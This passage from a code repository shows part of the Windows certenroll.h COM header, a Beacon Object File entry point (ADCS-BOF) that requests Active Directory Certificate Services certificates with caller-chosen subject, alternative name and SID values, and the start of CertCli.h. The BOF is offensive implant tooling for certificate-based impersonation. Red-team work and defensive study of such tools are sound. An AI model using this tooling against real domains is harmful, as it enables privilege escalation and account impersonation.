#define IX509SCEPEnrollmentHelper_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollmentHelper_Initialize(This,strServerUrl,strRequestHeaders,pRequest,strCACertificateThumbprint)	\
    ( (This)->lpVtbl -> Initialize(This,strServerUrl,strRequestHeaders,pRequest,strCACertificateThumbprint) ) 

#define IX509SCEPEnrollmentHelper_InitializeForPending(This,strServerUrl,strRequestHeaders,Context,strTransactionId)	\
    ( (This)->lpVtbl -> InitializeForPending(This,strServerUrl,strRequestHeaders,Context,strTransactionId) ) 

#define IX509SCEPEnrollmentHelper_Enroll(This,ProcessFlags,pDisposition)	\
    ( (This)->lpVtbl -> Enroll(This,ProcessFlags,pDisposition) ) 

#define IX509SCEPEnrollmentHelper_FetchPending(This,ProcessFlags,pDisposition)	\
    ( (This)->lpVtbl -> FetchPending(This,ProcessFlags,pDisposition) ) 

#define IX509SCEPEnrollmentHelper_get_X509SCEPEnrollment(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509SCEPEnrollment(This,ppValue) ) 

#define IX509SCEPEnrollmentHelper_get_ResultMessageText(This,pValue)	\
    ( (This)->lpVtbl -> get_ResultMessageText(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__ */



#ifndef __CERTENROLLLib_LIBRARY_DEFINED__
#define __CERTENROLLLib_LIBRARY_DEFINED__

/* library CERTENROLLLib */
/* [helpstring][version][uuid] */ 

typedef 
enum X509CertificateTemplateGeneralFlag
    {
        GeneralMachineType	= 0x40,
        GeneralCA	= 0x80,
        GeneralCrossCA	= 0x800,
        GeneralDefault	= 0x10000,
        GeneralModified	= 0x20000,
        GeneralDonotPersist	= 0x1000
    } 	X509CertificateTemplateGeneralFlag;

typedef 
enum X509CertificateTemplateEnrollmentFlag
    {
        EnrollmentIncludeSymmetricAlgorithms	= 0x1,
        EnrollmentPendAllRequests	= 0x2,
        EnrollmentPublishToKRAContainer	= 0x4,
        EnrollmentPublishToDS	= 0x8,
        EnrollmentAutoEnrollmentCheckUserDSCertificate	= 0x10,
        EnrollmentAutoEnrollment	= 0x20,
        EnrollmentDomainAuthenticationNotRequired	= 0x80,
        EnrollmentPreviousApprovalValidateReenrollment	= 0x40,
        EnrollmentUserInteractionRequired	= 0x100,
        EnrollmentAddTemplateName	= 0x200,
        EnrollmentRemoveInvalidCertificateFromPersonalStore	= 0x400,
        EnrollmentAllowEnrollOnBehalfOf	= 0x800,
        EnrollmentAddOCSPNoCheck	= 0x1000,
        EnrollmentReuseKeyOnFullSmartCard	= 0x2000,
        EnrollmentNoRevocationInfoInCerts	= 0x4000,
        EnrollmentIncludeBasicConstraintsForEECerts	= 0x8000,
        EnrollmentPreviousApprovalKeyBasedValidateReenrollment	= 0x10000,
        EnrollmentCertificateIssuancePoliciesFromRequest	= 0x20000,
        EnrollmentSkipAutoRenewal	= 0x40000
    } 	X509CertificateTemplateEnrollmentFlag;

typedef 
enum X509CertificateTemplateSubjectNameFlag
    {
        SubjectNameEnrolleeSupplies	= 0x1,
        SubjectNameRequireDirectoryPath	= 0x80000000,
        SubjectNameRequireCommonName	= 0x40000000,
        SubjectNameRequireEmail	= 0x20000000,
        SubjectNameRequireDNS	= 0x10000000,
        SubjectNameAndAlternativeNameOldCertSupplies	= 0x8,
        SubjectAlternativeNameEnrolleeSupplies	= 0x10000,
        SubjectAlternativeNameRequireDirectoryGUID	= 0x1000000,
        SubjectAlternativeNameRequireUPN	= 0x2000000,
        SubjectAlternativeNameRequireEmail	= 0x4000000,
        SubjectAlternativeNameRequireSPN	= 0x800000,
        SubjectAlternativeNameRequireDNS	= 0x8000000,
        SubjectAlternativeNameRequireDomainDNS	= 0x400000
    } 	X509CertificateTemplateSubjectNameFlag;

typedef 
enum X509CertificateTemplatePrivateKeyFlag
    {
        PrivateKeyRequireArchival	= 0x1,
        PrivateKeyExportable	= 0x10,
        PrivateKeyRequireStrongKeyProtection	= 0x20,
        PrivateKeyRequireAlternateSignatureAlgorithm	= 0x40,
        PrivateKeyRequireSameKeyRenewal	= 0x80,
        PrivateKeyUseLegacyProvider	= 0x100,
        PrivateKeyEKTrustOnUse	= 0x200,
        PrivateKeyEKValidateCert	= 0x400,
        PrivateKeyEKValidateKey	= 0x800,
        PrivateKeyAttestNone	= 0,
        PrivateKeyAttestPreferred	= 0x1000,
        PrivateKeyAttestRequired	= 0x2000,
        PrivateKeyAttestMask	= 0x3000,
        PrivateKeyAttestWithoutPolicy	= 0x4000,
        PrivateKeyServerVersionMask	= 0xf0000,
        PrivateKeyServerVersionShift	= 16,
        PrivateKeyHelloKspKey	= 0x100000,
        PrivateKeyHelloLogonKey	= 0x200000,
        PrivateKeyClientVersionMask	= 0xf000000,
        PrivateKeyClientVersionShift	= 24
    } 	X509CertificateTemplatePrivateKeyFlag;


EXTERN_C const IID LIBID_CERTENROLLLib;

EXTERN_C const CLSID CLSID_CObjectId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2000-217d-11da-b2a4-000e7bbb2b09")
CObjectId;
#endif

EXTERN_C const CLSID CLSID_CObjectIds;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2001-217d-11da-b2a4-000e7bbb2b09")
CObjectIds;
#endif

EXTERN_C const CLSID CLSID_CBinaryConverter;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2002-217d-11da-b2a4-000e7bbb2b09")
CBinaryConverter;
#endif

EXTERN_C const CLSID CLSID_CX500DistinguishedName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2003-217d-11da-b2a4-000e7bbb2b09")
CX500DistinguishedName;
#endif

EXTERN_C const CLSID CLSID_CCspInformation;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2007-217d-11da-b2a4-000e7bbb2b09")
CCspInformation;
#endif

EXTERN_C const CLSID CLSID_CCspInformations;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2008-217d-11da-b2a4-000e7bbb2b09")
CCspInformations;
#endif

EXTERN_C const CLSID CLSID_CCspStatus;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2009-217d-11da-b2a4-000e7bbb2b09")
CCspStatus;
#endif

EXTERN_C const CLSID CLSID_CX509PublicKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200b-217d-11da-b2a4-000e7bbb2b09")
CX509PublicKey;
#endif

EXTERN_C const CLSID CLSID_CX509PrivateKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200c-217d-11da-b2a4-000e7bbb2b09")
CX509PrivateKey;
#endif

EXTERN_C const CLSID CLSID_CX509EndorsementKey;

#ifdef __cplusplus

class DECLSPEC_UUID("11A25A1D-B9A3-4EDD-AF83-3B59ADBED361")
CX509EndorsementKey;
#endif

EXTERN_C const CLSID CLSID_CX509Extension;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200d-217d-11da-b2a4-000e7bbb2b09")
CX509Extension;
#endif

EXTERN_C const CLSID CLSID_CX509Extensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200e-217d-11da-b2a4-000e7bbb2b09")
CX509Extensions;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200f-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionEnhancedKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2010-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionEnhancedKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplateName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2011-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplateName;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2012-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplate;
#endif

EXTERN_C const CLSID CLSID_CAlternativeName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2013-217d-11da-b2a4-000e7bbb2b09")
CAlternativeName;
#endif

EXTERN_C const CLSID CLSID_CAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2014-217d-11da-b2a4-000e7bbb2b09")
CAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2015-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionBasicConstraints;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2016-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionBasicConstraints;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSubjectKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2017-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSubjectKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAuthorityKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2018-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAuthorityKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapability;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2019-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapability;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201a-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201b-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201c-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifier;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifiers;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201d-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifiers;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicy;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201e-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicy;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201f-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2020-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionMSApplicationPolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2021-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionMSApplicationPolicies;
#endif

EXTERN_C const CLSID CLSID_CX509Attribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2022-217d-11da-b2a4-000e7bbb2b09")
CX509Attribute;
#endif

EXTERN_C const CLSID CLSID_CX509Attributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2023-217d-11da-b2a4-000e7bbb2b09")
CX509Attributes;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeExtensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2024-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeExtensions;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeClientId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2025-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeClientId;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeRenewalCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2026-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeRenewalCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2027-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKey;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2028-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKeyHash;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeOSVersion;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202a-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeOSVersion;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeCspProvider;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202b-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeCspProvider;
#endif

EXTERN_C const CLSID CLSID_CCryptAttribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202c-217d-11da-b2a4-000e7bbb2b09")
CCryptAttribute;
#endif

EXTERN_C const CLSID CLSID_CCryptAttributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202d-217d-11da-b2a4-000e7bbb2b09")
CCryptAttributes;
#endif

EXTERN_C const CLSID CLSID_CCertProperty;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202e-217d-11da-b2a4-000e7bbb2b09")
CCertProperty;
#endif

EXTERN_C const CLSID CLSID_CCertProperties;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202f-217d-11da-b2a4-000e7bbb2b09")
CCertProperties;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyFriendlyName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2030-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyFriendlyName;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyDescription;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2031-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyDescription;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyAutoEnroll;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2032-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyAutoEnroll;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRequestOriginator;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2033-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRequestOriginator;
#endif

EXTERN_C const CLSID CLSID_CCertPropertySHA1Hash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2034-217d-11da-b2a4-000e7bbb2b09")
CCertPropertySHA1Hash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyKeyProvInfo;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2036-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyKeyProvInfo;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchived;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2037-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchived;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyBackedUp;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2038-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyBackedUp;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2039-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollment;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRenewal;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203a-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRenewal;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchivedKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203b-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchivedKeyHash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollmentPolicyServer;

#ifdef __cplusplus

class DECLSPEC_UUID("884e204c-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollmentPolicyServer;
#endif

EXTERN_C const CLSID CLSID_CSignerCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203d-217d-11da-b2a4-000e7bbb2b09")
CSignerCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509NameValuePair;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203f-217d-11da-b2a4-000e7bbb2b09")
CX509NameValuePair;
#endif

EXTERN_C const CLSID CLSID_CCertificateAttestationChallenge;

#ifdef __cplusplus

class DECLSPEC_UUID("1362ADA1-EB60-456A-B6E1-118050DB741B")
CCertificateAttestationChallenge;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs10;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2042-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs10;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2043-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs7;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2044-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs7;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCmc;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2045-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCmc;
#endif

EXTERN_C const CLSID CLSID_CX509Enrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2046-217d-11da-b2a4-000e7bbb2b09")
CX509Enrollment;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentWebClassFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2049-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentWebClassFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentHelper;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2050-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentHelper;
#endif

EXTERN_C const CLSID CLSID_CX509MachineEnrollmentFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2051-217d-11da-b2a4-000e7bbb2b09")
CX509MachineEnrollmentFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyActiveDirectory;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39027-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyActiveDirectory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyWebService;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39028-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyWebService;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerListManager;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39029-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerListManager;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerUrl;

#ifdef __cplusplus

class DECLSPEC_UUID("91f3902a-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerUrl;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateTemplateADWritable;

#ifdef __cplusplus

class DECLSPEC_UUID("8336E323-2E6A-4a04-937C-548F681839B3")
CX509CertificateTemplateADWritable;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationListEntry;

#ifdef __cplusplus

class DECLSPEC_UUID("884e205e-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationListEntry;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationListEntries;

#ifdef __cplusplus

class DECLSPEC_UUID("884e205f-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationListEntries;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationList;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2060-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationList;
#endif

EXTERN_C const CLSID CLSID_CX509SCEPEnrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2061-217d-11da-b2a4-000e7bbb2b09")
CX509SCEPEnrollment;
#endif

EXTERN_C const CLSID CLSID_CX509SCEPEnrollmentHelper;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2062-217d-11da-b2a4-000e7bbb2b09")
CX509SCEPEnrollmentHelper;
#endif
#endif /* __CERTENROLLLib_LIBRARY_DEFINED__ */

/* interface __MIDL_itf_certenroll_0000_0100 */
/* [local] */ 

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
typedef 
enum ImportPFXFlags
    {
        ImportNone	= 0,
        ImportMachineContext	= 0x1,
        ImportForceOverwrite	= 0x2,
        ImportSilent	= 0x4,
        ImportSaveProperties	= 0x8,
        ImportExportable	= 0x10,
        ImportExportableEncrypted	= 0x20,
        ImportNoUserProtected	= 0x40,
        ImportUserProtected	= 0x80,
        ImportUserProtectedHigh	= 0x100,
        ImportInstallCertificate	= 0x200,
        ImportInstallChain	= 0x400,
        ImportInstallChainAndRoot	= 0x800
    } 	ImportPFXFlags;

#ifdef __WINCRYPT_H__
typedef HRESULT (FNIMPORTPFXTOPROVIDER)(
            _In_ HWND hWndParent,
            _In_reads_bytes_(cbPFX) BYTE const *pbPFX,
            _In_ DWORD cbPFX,
            _In_ ImportPFXFlags ImportFlags,
            _In_opt_ PCWSTR pwszPassword,
            _In_opt_ PCWSTR pwszProviderName,
            _In_opt_ PCWSTR pwszReaderName,
            _In_opt_ PCWSTR pwszContainerNamePrefix,
            _In_opt_ PCWSTR pwszPin,
            _In_opt_ PCWSTR pwszFriendlyName,
            _Out_opt_ DWORD *pcCertOut,
            _Outptr_opt_result_buffer_(*pcCertOut) PCCERT_CONTEXT **prgpCertOut);
typedef VOID (FNIMPORTPFXTOPROVIDERFREEDATA)(
            _In_ DWORD cCert,
            _In_reads_opt_(cCert) PCCERT_CONTEXT *rgpCert);
FNIMPORTPFXTOPROVIDER ImportPFXToProvider;
FNIMPORTPFXTOPROVIDERFREEDATA ImportPFXToProviderFreeData;
#endif // __WINCRYPT_H__
#ifdef __cplusplus
}
#endif  /* __cplusplus */
#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0100_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0100_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree64(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request/entry.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"
#include "base.c"
#include "adcs_request.c"


#ifdef BOF
VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	HRESULT hr = S_OK;
	datap parser;
	LPCWSTR lpswzCA = NULL;
	LPCWSTR lpswzTemplate = NULL;
	LPCWSTR lpswzSubject = NULL;
	LPCWSTR lpswzAltName = NULL;
	LPCWSTR lpswzAltUrl = NULL;
	LPCWSTR lpswzPfxPassword = NULL;
	BOOL bInstall = FALSE;
	BOOL bMachine = FALSE;
	BOOL addAppPolicy = FALSE;
	BOOL dns = FALSE;
	BOOL bPem = FALSE;
    
	if (!bofstart())
	{
		return;
	}

	BeaconDataParse(&parser, Buffer, Length);
	lpswzCA = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzTemplate = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzSubject = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzAltName = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzAltUrl = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	lpswzPfxPassword = (LPCWSTR)BeaconDataExtract(&parser, NULL);
	bInstall = (BOOL)BeaconDataShort(&parser);
	bMachine = (BOOL)BeaconDataShort(&parser);
	addAppPolicy = (BOOL)BeaconDataShort(&parser);
	dns = (BOOL)BeaconDataShort(&parser);
	bPem = (BOOL)BeaconDataShort(&parser);
	
	internal_printf("\nRequesting a %S certificate from %S for the current user\n", lpswzTemplate, lpswzCA);

	hr = adcs_request(
		lpswzCA, 
		lpswzTemplate,
		lpswzSubject,
		lpswzAltName,
		lpswzAltUrl,
		lpswzPfxPassword,
		bInstall,
		bMachine,
		addAppPolicy,
		dns,
		bPem
	);
	if (S_OK != hr)
	{
		BeaconPrintf(CALLBACK_ERROR, "Failed: 0x%08lx\n", hr);
		goto fail;
	}

	internal_printf("\n--- SUCCESS ---\n");

fail:
	printoutput(TRUE);

	bofstop();
};
#else
#define TEST_CA L"Cert.testrange.local\\testrange-CERT-CA"
#define TEST_TEMPLATE L""
#define TEST_SUBJECT L""
#define TEST_ALTNAME L""
#define TEST_ALTURL L""
//#define TEST_ALTURL L"tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105"
#define TEST_PFX_PASSWORD L""
#define TEST_INSTALL FALSE
#define TEST_MACHINE FALSE
#define TEST_APPPOLICY FALSE
#define TEST_DNS FALSE
#define TEST_PEM FALSE
int main(int argc, char ** argv)
{
	HRESULT hr = S_OK;
	LPCWSTR lpswzCA = TEST_CA;
	LPCWSTR lpswzTemplate = TEST_TEMPLATE;
	LPCWSTR lpswzSubject = TEST_SUBJECT;
	LPCWSTR lpswzAltName = TEST_ALTNAME;
	LPCWSTR lpswzAltUrl = TEST_ALTURL;
	LPCWSTR lpswzPfxPassword = TEST_PFX_PASSWORD;
	BOOL bInstall = TEST_INSTALL;
	BOOL bMachine = TEST_MACHINE;
	BOOL bAppPolicy = TEST_APPPOLICY;
	BOOL bDNS = TEST_DNS;
	BOOL bPem = TEST_PEM;

	internal_printf("\nRequesting a %S certificate from %S for the current user\n", lpswzTemplate, lpswzCA);

	hr = adcs_request(
		lpswzCA, 
		lpswzTemplate,
		lpswzSubject,
		lpswzAltName,
		lpswzAltUrl,
		lpswzPfxPassword,
		bInstall,
		bMachine,
		bAppPolicy,
		bDNS,
		bPem
	);
	if (S_OK != hr)
	{
		BeaconPrintf(CALLBACK_ERROR, "Failed: 0x%08lx\n", hr);
		goto fail;
	}

	internal_printf("\n--- SUCCESS ---\n");

fail:
	return hr;
}
#endif

	






================================================
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/CertCli.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certcli_h__
#define __certcli_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __ICertGetConfig_FWD_DEFINED__
#define __ICertGetConfig_FWD_DEFINED__
typedef interface ICertGetConfig ICertGetConfig;

